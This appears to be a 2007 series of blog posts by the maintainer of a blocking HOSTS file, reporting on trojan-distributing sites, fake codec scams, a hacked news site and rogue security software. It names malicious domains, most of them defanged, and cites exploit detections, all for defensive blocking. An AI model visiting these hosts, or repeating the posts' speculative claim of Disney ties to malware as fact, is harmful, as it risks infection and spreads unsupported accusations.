Hosts News

Disney has some explaining to do

Following up on a tip from the Castlecops MIRT Team (Malware Incident Reporting and Termination) about a new entry for mcboo(dot)com. As you can see below this new entry is definately a nasty.

Now what I find disturbing is that I decided to "Google" and see if there were any other new entries that I should add to the HOSTS file. Well, I find the following:

hxxp://j10.wrs.mcboo.com/retadpu.exe?affID=27

Which redirects to go.com (operated by Disney) ... so I checked the DNS of that entry and find it is actually "disney.com" ... huh? What in the world is Disney doing associating with the MatCash Family of Trojans?

"Win32/Matcash is a family of multi-component trojans that can be used to download and execute arbitrary files."

McAfee detects another mcboo entry as Downloader-BCF The question I have is who is "affID=27"?
Is Disney affiliate #27 to the MatCash Trojan Family? ... Oh Disney what were you thinking?
199.181.132.250 = Disney Worldwide Services

While still researching the malicious "mcboo(dot)com" entries I find this ... look familar? Yeah we've seen this malicious trick many many times before (Missing Video Codec) ...

And just who is involved in this latest Trojan.Codec scam? ... you guessed it "mcboo(dot)com) ...

So just what relationship does Disney (go.com) have with these *** peddlers, because "waverevenue(dot)com" is a hard-core porn site ... Oh Disney what were you thinking?

When is a Image file not a Image file

When is a Image file not a Image file ... when it is used to redirect the visitor to another often malicious site. You would think by now (Windows Vista) that Microsoft would have corrected this flaw, but I guess not ...

Look closely in the Result column at the "favicon.ico" entry above, notice the "302" ... well 302 is used to redirect the browser to another location ... in this case -  "adult-models(dot)org" which NOD32 detects as: JS/Exploit.MS05-013. There are about 15 other related sites that I found using this same "302" redirect method.

Although "MS05-013" is an older patched vulnerability, it is still rather nasty ...

If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

This is a good example why it's so important to keep your Windows updates current, or upgrade to Windows Vista.

SANS Warning - Active Banner Ads

Looks like my HOSTS file got a mention yesterday from SANS Internet Storm Center - warning about the evils of Active Banner Ads. Although I would disagree with the following:

The innocent-looking ad contains javascript that re-directs the browser to a compromised bot, which in turn re-directs the browser to the final malware page.  Thus, a website blocking any ads linking to systemdoctor.com or winfixer won't help.

Well at some point the malicious site must link back to systemdoctor/winfixer in order to attempt to install their software, and this is where the HOSTS file will block that attempt ...

Beware of encoded URLs

I found a Forum spam post know as Spamdexing today that used a encoded URL (these are never good) ...

This one decodes to "xx-amateur-movies(dot)org" which then redirects to several other sites and as you can see below, the visitor ends up on a Trojan.Codec site.

There are about 20 other sites related to this lastest scam which are detected as Trojan.Win32.DNSChanger.jb

A bogus Message Box Object Error

Landing on "sexempire(dot)biz" ... a "Malicious.Links" site ... the visitor is first presented with "scanner(dot)malwarealarm(dot)com" a Rogue Security Program. What's worse is that any link clicked displays the following bogus message.

Now no matter which button you click you are prompted to download a bogus ActiveX Object. freerealitympegs(dot)com then redirects to nmextensions(dot)com (already included in the HOSTS file) which is detected as: Trojan.Dropper.Multi.IV

Adware Class Action Lawsuit against ValueClick

This should be interesting if it goes forward ... full story here (pdf)

The suit alleges that defendants ValueClick, Inc., Commission Junction, Inc. and Be Free (collectively, “ValueClick”) have engaged in unfair business practices resulting in harm to affiliates and merchants on their affiliate networks. According to the complaints, ValueClick has failed to take reasonable steps to address malicious adware and adware users on its networks.

The lawsuits also allege that ValueClick has a motive to allow unlawful adware activity on its networks because adware results in increased revenues to ValueClick.

"ValueClick has a motive to allow unlawful adware activity on its networks because adware results in increased revenues"

Wow that last sentence sure sounds familiar doesn't it ... as readers of this blog know I complained about that very same practice with ValueClick's involvement with the WinFixer Group. I hope the law firm bring this suit has some good legal-eagles as ValueClick has some very deep pockets.

Local NYC New Organization Hacked

While browsing a new story via Google, landing on a news site (brooklyndowntownstar(dot)com) I discovered that their server has been hacked and several Javascripts have been injected.

The javascripts decode to several Chinese registered sites, although several are no longer functioning. While I'm not sure their purpose, it looks like they are advertising related rather than malicious ...

The reason I mention their server has been hacked rather than just that site is this News Organization operates several other newspaper sites in the NYC area, and in checking they are all infected ...

All the links to other sites above in the left column all generate the same injected javascripts ... I have contacted them via their contact page but no response as of yet ... looks like the IT staff there is asleep at the wheel. Hopefully this will get corrected soon as these hackers could have injected malicious content just as easy ...

Update: after contacting the required parties via their Whois info email address ... the problem has been corrected.

MVPS HOSTS File Update 06-14-07

The MVPS HOSTS file was recently updated [06-14-07]
http://www.mvps.org/winhelp2002/hosts.htm

Download: hosts.zip (140 kb)
http://www.mvps.org/winhelp2002/hosts.zip

How To: Download and Extract the HOSTS file
http://www.mvps.org/winhelp2002/hosts2.htm

HOSTS File - Frequently Asked Questions
http://www.mvps.org/winhelp2002/hostsfaq.htm

Note: the "text" version makes a great resource
for determining possible culprits ... (591 kb)
http://www.mvps.org/winhelp2002/hosts.txt

Sign up for HOSTS file update notices
http://www.mvps.org/winhelp2002/hosts.htm#contribute

Zango/Hotbar after 1 Year

It was one year ago this week that Zango and Hotbar merged ... so how are they doing?

Zango (in blue) and Hotbar (in red) both seemed to have dropped in traffic flow quite a bit over the last year. Doesn't look like things are going well ... I guess someone at Zango must have determined that their drop in traffic was due to PcTools, so they sued them. However this is not going well either ... Zango subsequently lost a similar suit seeking a restraining order against Kaspersky.

Bogus Media Software

Landing on "about-sexy(dot)com" or sadly about 40 other similar sites, the viewer is presented with yet another bogus message

This redirects to "funcodec(dot)com" detected as: Trojan.Win32.DNSChanger.jb. Needless to say I spent quite a bit of time locating these culprits and adding them to the next HOSTS file update ...

Visiting the StopBadware Database

In light of several reports lately about the amount of Malware sites that now exist, I thought I'd go thru the database at StopBadware.org and see what I could find ... 92,000 sites ... wow!

Over the last several days I visited 10,000 ... that's right 10,000 which should give a good cross-section of their database. What I found was the majority of these sites or Forums, etc have been hacked and the culprits have injected a variety of Malware ... some of them are pretty nasty, many of them (hacked sites) contain multiple exploits.

Armed with only my HOSTS file and my NOD32 Antivirus (no antispyware) on Windows Vista, I added the culprits (several hundred) to the HOSTS file as I found them. So how did I make out? Not one, let me repeat, not one exploit was able to get thru my defenses, that's pretty impressive and says a lot of the added security of Windows Vista.

Now I have to give a lot of credit to my antivirus NOD32 from eset.com, which detected a lot of Malware before the site even finished loading. Which by the way was just awarded the highest rating from av-comparatives.org. You can view the full report here (.pdf)

I've listed below the latest detections by NOD32 while I was going thru the list of reported Malware sites ... naturally these will be added to the next update of the HOSTS file.

Note: while I was tied up with this project over the last few days I may have missed sending a few of you the Update Notices for the latest HOSTS file version ... sorry about that ...

WinFixer - here we go again

Landing on "damiboy(dot)com" a Google.Warning site the viewer gets whacked automatically with several exploits and for good measure ... several Rogue products ... better have your layered protection in order!

As soon as I landed on the site my AV NOD32 jumped up with the below ... as you can see the site also tries to load a exploit via Java. Which I do not have installed ... just for that reason, Sun can not seem to keep up with the exploits of their software.

Let's look at the cast of characters involved, and their are many ...

The 502 sites you see in red are already in my HOSTS file, the others will be added to the next update. Nice place for the WinFixer Group to hawk their bogus software. I really feel sorry for anyone that lands on this site that doesn't have adequate protection.